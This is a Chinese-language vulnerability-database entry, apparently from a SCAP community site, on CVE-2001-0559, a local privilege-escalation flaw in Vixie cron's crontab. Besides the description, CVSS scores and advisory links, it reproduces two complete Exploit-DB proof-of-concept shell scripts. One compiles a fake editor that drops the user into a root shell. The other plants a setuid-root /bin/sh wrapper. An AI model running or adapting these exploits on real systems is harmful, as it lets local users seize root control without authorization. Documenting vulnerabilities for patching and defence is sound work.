CVE-2001-0559
CVSS7.2
发布时间 :2001-08-14 00:00:00
修订时间 :2008-09-10 15:08:24
NMCOE    

[原文]crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after the failed parsing of a modification operation, which could allow a local attacker to gain additional privileges when an editor is called to correct the error.


[CNNVD]Vixie cron特权提升漏洞(CNNVD-200108-066)

        Vixie cron 3.0.1版本及之前版本的定时任务在修正操作的失败剖析后不能正确地减低特权,本地攻击者可以在编辑器被调用去修正改错误时提升额外特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0559
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0559
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2687
(VENDOR_ADVISORY)  BID  2687
http://www.securityfocus.com/archive/1/183029
(VENDOR_ADVISORY)  BUGTRAQ  20010507 Vixie cron vulnerability
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-050.php3
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:050
http://www.debian.org/security/2001/dsa-054
(VENDOR_ADVISORY)  DEBIAN  DSA-054
http://xforce.iss.net/static/6508.php
(UNKNOWN)  XF  vixie-cron-gain-privileges(6508)
http://www.novell.com/linux/security/advisories/2001_017_cron_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:17

- 漏洞信息

Vixie cron特权提升漏洞
高危 未知
2001-08-14 00:00:00 2005-05-02 00:00:00
本地  
        Vixie cron 3.0.1版本及之前版本的定时任务在修正操作的失败剖析后不能正确地减低特权,本地攻击者可以在编辑器被调用去修正改错误时提升额外特权。

- 公告与补丁

        

- 漏洞信息 (20822)

Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (1) (EDBID:20822)
linux local
2001-05-07 Verified
0 Sebastian Krahmer
N/A [点击下载]
source: http://www.securityfocus.com/bid/2687/info

Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.

When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.

This vulnerability may be exploited to gain root privileges locally. 

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else {
    dup2(1,0);
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n");
    system("touch $HOME/.xploited");
    system("bash");
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi


		

- 漏洞信息 (20823)

Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (2) (EDBID:20823)
linux local
2001-07-05 Verified
0 cairnsc
N/A [点击下载]
source: http://www.securityfocus.com/bid/2687/info
 
Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.
 
When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.
 
This vulnerability may be exploited to gain root privileges locally. 

#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
#   the crontab file maintenance program (crontab) fails to drop privileges
#   before invoking the editor under certain circumstances.
#
# description:
#   a serialization error exists in some versions of the file maintenance
#   program, crontab.  the vulnerability was introduced in versions which
#   were patched for seperate vulnerability in fall of 2000 (see Bugtraq
#   ID #1960).
#
#   when a parsing error occurs after a modification operation, crontab will
#   fail to drop privileges correctly for subsequent modification operations.
#   because the program is installed setuid root, it may be possible for a
#   local user to gain root privileges.
#
# affected versions:
#   cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
#   note that copies of the program with the patch mentioned above are likely
#   to also be vulnerable.
#
# references:
#   http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com

CRONTAB=/usr/bin/crontab

if ! test -x $CRONTAB; then
  echo "** unable to locate crontab executable, exiting"
  exit 1
fi

cat > vcsh.c << EOF
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
}
EOF

echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c

if ! test -x $PWD/vcsh; then
  echo "** compilation failed, exiting"
  exit 1
fi

echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh

sleep 1 && echo "foo" >> \$1

if test -f $PWD/vcboom; then
  chown root.root $PWD/vcsh
  chmod 4755 $PWD/vcsh
  rm $PWD/vcboom
else
  touch $PWD/vcboom
fi
EOF

chmod 0755 $PWD/vcex.sh

echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo

(EDITOR=$PWD/vcex.sh $CRONTAB -e)

echo
echo "** done, the shell wrapper should be suid root"
exit 0		

- 漏洞信息

1813
Vixie Cron crontab Privilege Lowering Handling Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2001-05-07 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站